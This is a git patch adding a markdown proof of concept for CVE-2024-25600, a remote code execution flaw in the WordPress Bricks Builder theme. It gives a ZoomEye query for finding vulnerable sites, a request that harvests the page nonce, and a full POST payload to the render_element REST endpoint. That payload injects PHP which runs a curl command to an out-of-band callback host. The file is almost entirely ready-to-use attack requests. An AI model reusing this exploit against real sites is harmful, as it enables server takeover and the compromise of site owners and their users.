From e2ddd75bec6cb2dd4062ec8d49b9124f2764507e Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Sat, 9 Mar 2024 15:17:48 +0800
Subject: [PATCH] =?UTF-8?q?Create=20WordPress=E6=8F=92=E4=BB=B6Bricks=20Bu?=
 =?UTF-8?q?ilder=E5=AD=98=E5=9C=A8RCE=E6=BC=8F=E6=B4=9E(CVE-2024-25600).md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...Bricks Builder存在RCE漏洞(CVE-2024-25600).md | 46 +++++++++++++++++++
 1 file changed, 46 insertions(+)
 create mode 100644 WordPress插件Bricks Builder存在RCE漏洞(CVE-2024-25600).md

diff --git a/WordPress插件Bricks Builder存在RCE漏洞(CVE-2024-25600).md b/WordPress插件Bricks Builder存在RCE漏洞(CVE-2024-25600).md
new file mode 100644
index 0000000..89520ed
--- /dev/null
+++ b/WordPress插件Bricks Builder存在RCE漏洞(CVE-2024-25600).md
@@ -0,0 +1,46 @@
+## WordPress插件Bricks Builder存在RCE漏洞(CVE-2024-25600)
+
+## zoomeye
+```
+web.body="/wp-content/themes/bricks/"
+```
+
+## poc
+
+### 获取nonce值
+```
+GET / HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:96.0) Gecko/20100101 Firefox/96.0
+Connection: close
+Accept-Encoding: gzip, deflate
+```
+![f8692e900e34adeb6f8b23677258b8e1](https://github.com/wy876/POC/assets/139549762/656552ce-28a6-407a-b746-56bd36ea3eb0)
+
+### rce
+```
+POST /wp-json/bricks/v1/render_element HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
+Connection: close
+Content-Length: 401
+Content-Type: application/json
+Accept-Encoding: gzip, deflate
+
+{
+ "postId": "1",
+ "nonce": "c5b5949**",
+ "element": {
+ "name": "container",
+ "settings": {
+ "hasLoop": "true",
+ "query": {
+ "useQueryEditor": true,
+ "queryEditor": "ob_start();echo `curl cnc4ej5blq62an78ck6giyhcffmdr5t56.oast.pro`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
+ "objectType": "post"
+ }
+ }
+ }
+}
+```
+![78880674cd49cefc6d5787c30efaf8cd](https://github.com/wy876/POC/assets/139549762/986bebf0-4369-462b-923c-775434318338)